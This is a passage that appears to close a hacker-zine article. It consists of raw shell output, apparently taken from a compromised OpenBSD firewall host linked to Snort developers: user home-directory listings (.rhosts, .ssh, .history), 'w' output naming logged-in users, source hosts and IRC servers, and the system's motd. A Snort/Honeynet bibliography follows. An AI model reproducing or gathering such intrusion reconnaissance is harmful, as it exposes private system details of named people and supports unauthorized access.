---- .profile -rw------- 1 sfuser1 sfuser1 128 --- -- ---- .rhosts -rw-r--r-- 1 sfuser1 sfuser1 3034 --- -- ---- logs.out drwxr-xr-x 2 sfuser1 sfuser1 1536 --- -- ---- veridian sschwing: total 14 drwxr-xr-x 2 sschwing sschwing 512 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. -rw-r--r-- 1 sschwing sschwing 769 --- -- ---- .cshrc -rw-r--r-- 1 sschwing sschwing 318 --- -- ---- .login -rw-r--r-- 1 sschwing sschwing 105 --- -- ---- .mailrc -rw-r--r-- 1 sschwing sschwing 201 --- -- ---- .profile -rw------- 1 sschwing sschwing 128 --- -- ---- .rhosts tburgess: total 3040 drwxr-xr-x 4 tburgess tburgess 512 --- -- ---- . drwxr-xr-x 15 root wheel 512 --- -- ---- .. -rw-r--r-- 1 tburgess tburgess 769 --- -- ---- .cshrc -rw------- 1 tburgess tburgess 2265 --- -- ---- .history -rw-r--r-- 1 tburgess tburgess 318 --- -- ---- .login -rw-r--r-- 1 tburgess tburgess 105 --- -- ---- .mailrc -rw-r--r-- 1 tburgess tburgess 201 --- -- ---- .profile -rw------- 1 tburgess tburgess 128 --- -- ---- .rhosts drwx------ 2 tburgess tburgess 512 --- -- ---- .ssh -rw-r--r-- 1 tburgess tburgess 1525673 --- -- ---- ossh-comp29-33.tgz drwxr-xr-x 15 tburgess tburgess 4608 --- -- ---- ssh w; --:---M up --- days, -:--, 12 users, load averages: 0.29, 0.19, 0.12 USER TTY FROM LOGIN@ IDLE WHAT cmg p0 snorty-ext:S.3 ------- -:-- -usr/local/bin/tcsh cmg p1 snorty-ext:S.0 ------- - epic irc.secsup.uu.net bmc p2 sdsl-64-32-241-7 ------- - BitchX cazz irc.secsup.uu.net cmg p3 snorty-ext:S.4 ---------days -sh cmg p4 snorty-ext:S.2 ---------days ssh ns1 cmg p5 snorty-ext:S.6 ------- -:-- -usr/local/bin/tcsh bmc p6 sdsl-64-32-241-7 ------- - BitchX cazz irc.openprojects.net bmc p7 sdsl-64-32-241-7 ------- - BitchX cazz irc.shmoo.com cmg p9 snorty-ext:S.7 ------- -:-- -usr/local/bin/tcsh cmg pb snorty-ext:S.1 ------- -days ssh www.sourcefire.com cmg pd snorty-ext:S.5 ------- -days ssh mail cmg q2 snorty-ext:S.8 ------- -:-- -usr/local/bin/tcsh cat /etc/motd OpenBSD 2.9 (FW) #0: Fri --- -- ----:-- EDT ---- [=-- Bibliography --=] 1. About Snort - [http://www.snort.org/about.html] 2. Honeynet Related Research Projects - [http://www.honeynet.org/research/index.html] 3. Snort Rules Database - [http://www.snort.org/snort-db/] |=[ EOF ]=---------------------------------------------------------------=|